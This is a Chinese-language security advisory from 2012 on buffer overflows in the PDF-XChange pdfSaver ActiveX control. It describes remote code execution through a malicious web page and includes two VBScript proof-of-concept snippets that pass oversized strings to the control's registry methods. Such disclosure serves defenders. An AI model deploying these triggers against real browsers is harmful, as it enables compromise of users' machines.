PDF-XChange pdfSaver ActiveX多个缓冲区溢出漏洞

日期: 2012/02/01 | 标签: | 游览:373

漏洞起因
边界条件错误
危险等级

影响系统
Tracker Software PDF-XChange pdfSaver ActiveX 3.60.0128

不受影响系统

危害
远程攻击者可以利用漏洞以应用程序上下文执行任意代码。

攻击所需条件
攻击者必须构建恶意WEB页,诱使用户解析。

漏洞信息
PDF-XChange Viewer是一款PDF阅读软件。
PDF-XChange pdfSaver ActiveX控件存在缓冲区溢出问题,远程攻击者可以构建恶意WEB页,诱使用户解析,以应用程序上下文执行任意代码。

测试方法
<object classid=’clsid:2EE01CFA-139F-431E-BB1D-5E56B4DCEC18′ id=’zsl’ />
<script language=’vbscript’>
targetFile = “C:\PDF-XChange\pdfSaver\pdfxctrl.dll”
prototype  = “Sub StoreInRegistry ( ByVal page_id As PdfPrinterDialogPage ,  ByVal sub_path As String )”
memberName = “StoreInRegistry”
progid     = “pdfxctrlLib.PdfPrinterPreferences”
argCount   = 2
arg1=1
arg2=String(6164, “A”)
zsl.StoreInRegistry arg1 ,arg2
</script>
——————–
<object classid=’clsid:2EE01CFA-139F-431E-BB1D-5E56B4DCEC18′ id=’zsl’ />
<script language=’vbscript’>
targetFile = “C:\PDF-XChange\pdfSaver\pdfxctrl.dll”
prototype  = “Sub InitFromRegistry ( ByVal page_id As PdfPrinterDialogPage ,  ByVal sub_key As String )”
memberName = “InitFromRegistry”
progid     = “pdfxctrlLib.PdfPrinterPreferences”
argCount   = 2
arg1=1
arg2=String(14356, “A”)
zsl.InitFromRegistry arg1 ,arg2
</script>

厂商解决方案
目前没有详细解决方案提供:
http://www.tracker-software.com/product/pdf-xchange-viewer

漏洞提供者
LiquidWorm

评论关闭。